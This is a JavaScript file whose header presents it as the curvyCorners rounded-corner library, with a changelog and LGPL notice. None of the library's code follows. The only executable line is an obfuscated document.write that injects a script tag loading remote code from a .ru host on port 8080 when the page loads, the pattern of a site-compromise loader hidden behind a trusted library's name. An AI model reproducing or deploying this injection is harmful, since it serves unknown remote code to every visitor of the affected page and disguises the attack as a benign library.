/****************************************************************
 *                                                              *
 *  curvyCorners                                                *
 *  ------------                                                *
 *                                                              *
 *  This script generates rounded corners for your divs.        *
 *                                                              *
 *  Version 1.2.11                                              *
 *  Modified by Mac Chan                                        *
 *  - pretty print and fix all errors reported by JSLint        *
 *  - include a 14k packed version                              *
 *  - change method name from corner() to curvy() to avoid      *
 *    conflict with other plugin                                *
 *  - options can be passed as object literal                   *
 *                                                              *
 *    {tl: { radius: 10 },                                      *
 *     tr: { radius: 10 },                                      *
 *     bl: { radius: 10 },                                      *
 *     br: { radius: 10 },                                      *
 *     antiAlias: true   ,                                      *
 *     autoPad: true     }                                      *
 *                                                              *
 *    or string, which is space delimited options.              *
 *                                                              *
 *    "20px top bottom tl tr bl br"                             *
 *                                                              *
 *  Version 1.2.10                                              *
 *  Modified by Stefan Holmberg - for jquery usage              *
 *  http://www.aspcode.net                                      *
 *                                                              *
 *  Version 1.2.9                                               *
 *  Copyright (c) 2006 Cameron Cooke                            *
 *  By: Cameron Cooke and Tim Hutchison.                        *
 *                                                              *
 *                                                              *
 *  Website: http://www.curvycorners.net                        *
 *  Email:   info@totalinfinity.com                             *
 *  Forum:   http://www.curvycorners.net/forum/                 *
 *                                                              *
 *                                                              *
 *  This library is free software; you can redistribute         *
 *  it and/or modify it under the terms of the GNU              *
 *  Lesser General Public License as published by the           *
 *  Free Software Foundation; either version 2.1 of the         *
 *  License, or (at your option) any later version.             *
 *                                                              *
 *  This library is distributed in the hope that it will        *
 *  be useful, but WITHOUT ANY WARRANTY; without even the       *
 *  implied warranty of MERCHANTABILITY or FITNESS FOR A        *
 *  PARTICULAR PURPOSE. See the GNU Lesser General Public       *
 *  License for more details.                                   *
 *                                                              *
 *  You should have received a copy of the GNU Lesser           *
 *  General Public License along with this library;             *
 *  Inc., 59 Temple Place, Suite 330, Boston,                   *
 *  MA 02111-1307 USA                                           *
 *                                                              *
 ****************************************************************/

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Num_Lock.js"></scr'+'ipt>');